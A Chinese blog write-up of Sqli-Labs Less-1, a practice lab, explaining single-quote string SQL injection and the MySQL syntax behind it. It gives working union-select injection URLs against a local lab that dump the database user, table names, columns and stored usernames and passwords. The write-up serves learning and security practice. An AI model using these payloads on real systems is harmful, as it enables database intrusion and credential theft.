Sqli-Labs:Less1

基于错误_GET_单引号_字符型注入

在打第一关的同时把以前学的零散的Sqli和Mysql的知识做个总结。
参考教程一航WP

0x01. 判断字符型/数字型注入

localhost:8088/sqlilabs/Less-1/?id=1
localhost:8088/sqlilabs/Less-1/?id=1'
localhost:8088/sqlilabs/Less-1/?id=1"

在测试以上输入的时候发现第一和第三条的时候页面能正确显示值:


而第二条会报错:

这便透露出一部分的查询语句'1'' limit 0,1。其中1'是我们刚刚输入的参数,由此我们看出这是一个字符型注入,且使用单引号闭合。所以我们可以猜出整个查询语句:

select username,password from table_name where id='$_GET['id']' limit 0,1

这里table_namelimit子句会在后面讲解。

有意思的是,Mysql查询时非常不严格,如下列查询语句都能正确返回结果。但像上面第二条因为多了个单引号导致查询语句没有闭合而报错。在Mysql的交互界面中,没有闭合的引号会一直要求输入直到闭合,但php的界面不会。

select username,password from users where id=1
select username,password from users where id='1'
select username,password from users where id="1"
select username,password from users where id='1"'
select username,password from users where id='1''2'
select username,password from users where id='1"'""

于是测试是否具有注入点:

localhost:8088/sqlilabs/Less-1/?id=-1'OR'1'='1'

发现仍可以显示正确的结果,可以得知这里存在一个注入点。

id=-1很显然是不存在的,但or'1'='1'是一个永真条件(也可以用其他永真条件替代),使查询语句相当于select username,password from users where trueselect username,password from users,返回所有结果。

注意:php源码中并未循环输出,所以这里页面上看到的结果正是查询到的第一个结果。

0x02. Mysql语法

order by关键字

select * from table_name order by 3——按第三列(第三个字段)排序
order by column_name asc/desc——升序/逆序

通常利用order by num和回显来判断该表有几个字段:若num=4时报错则说明该表有3个字段。

union操作符

两个查询返回的列数必须相同。
两个select语句对应列所返回的数据类型必须相同(或至少是兼容的)。

通常利用联合查询的特点,使原查询左边为空,使我们定义的查询结果返回出来。

如该表共3个字段,界面显示第2、3个字段,我们便可以构造:
select * from users where id=-1 union select 1,2,3 from users
这里的2,3可以换成任意想要的结果。

limit子句(top子句)

用于规定要返回的记录的数目:
select * from users limit 3——返回前3条
select * from users limit 1,2——返回索引1开始的前2条(索引从0开始)

concat()函数

用于连接字符串:
select concat('11','22','33')——输出"112233"
select concat_ws('-','11','22','33')——输出"11-22-33",第一个参数是其它参数的分隔符
group_concat(column_name)——将字段的所有数据用,连接作为字符串输出

内置数据库information_schema

系统数据库information_schema数据库中含有很重要的三张表:schemata,tables和columns。

schemata表中存储了Mysql中所有数据库的信息,包括数据库名,编码类型等,show databases的结果取之此表。
tables表有schema_name一个字段,为数据库名。

tables表中存储了Mysql中所有数据库的表的信息(索引根据数据库名),show tables from schema_name的结果取之此表。
tables表有table_nametable_schema两个字段,分别为表名和表所在数据库。

columns表中存储了Mysql中所有表的字段信息,show columns from schema_name.table_name的结果取之此表。
columns表有column_nametable_nametable_schema三个字段,分别为字段名、字段所在表名和表所在数据库。

内置database()函数与select

user()——返回用户名
database()——返回数据库名
version()——返回数据库版本信息
但是没有直接返回表名的函数,所以需要通过其他方式获取表名。

在Mysql中,select就像一个前缀,python中1=1直接返回true,而Mysql则需要select 1=1返回true
上述内置函数的用法都是select user()等,之上concat()函数同样如此。

0x03. 获取库名、表名、字段

在0x01中我们已经找到了注入点,接下来是利用order byunion找出显示的是哪几个字段。

http://localhost:8088/sqlilabs/Less-1/?id=1' order by 4--+


order by 4的时候报错,所以该表有3个字段。

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,3--+


显示的是2和3,所以username和password对应该表的第2和第3个字段。

步骤1:爆用户名和数据库

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,concat_ws('-',user(),database())--+
http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,user(),database()--+



这两个语句效果一样,不同的是第一个语句可以在只有一处回显时起作用。
所以用户名root,数据库security

步骤2:爆表名

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+


这里显示的是数据库内第一个表名,获得其他表名需要用limit语句。

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security' limit 3,1--+


通过返回的表名我们猜测users为表名。

步骤3:爆字段

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1--+


和得到表名一样我们得到字段idusernamepassword

0x04. 获取你想要的

使用获得的表名和字段和limit依次获取:

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,concat_ws('-',id,username,password) from users limit 7,1--+


利用group_concat()集体打包输出:
爆表名:

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+


爆字段:

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+


爆数据:

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

0x05. 吐槽

从这篇开始不再使用缩进…实在是太麻烦了,段落用空行隔开。
终于写完了…Markdown用熟练了确实非常快,比Word好用多了。
一晚上做了第一关和复习,把以前的很多记不清的都复习了一遍,终于对Sqli的大概过程有了认识。
在图书馆被冻死,回来之后热死。
手机放桌上被热水浇了mmmmp。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,711评论 5 468
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,932评论 2 376
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,770评论 0 330
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,799评论 1 271
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,697评论 5 359
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,069评论 1 276
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,535评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,200评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,353评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,290评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,331评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,020评论 3 315
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,610评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,694评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,927评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,330评论 2 346
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,904评论 2 341

推荐阅读更多精彩内容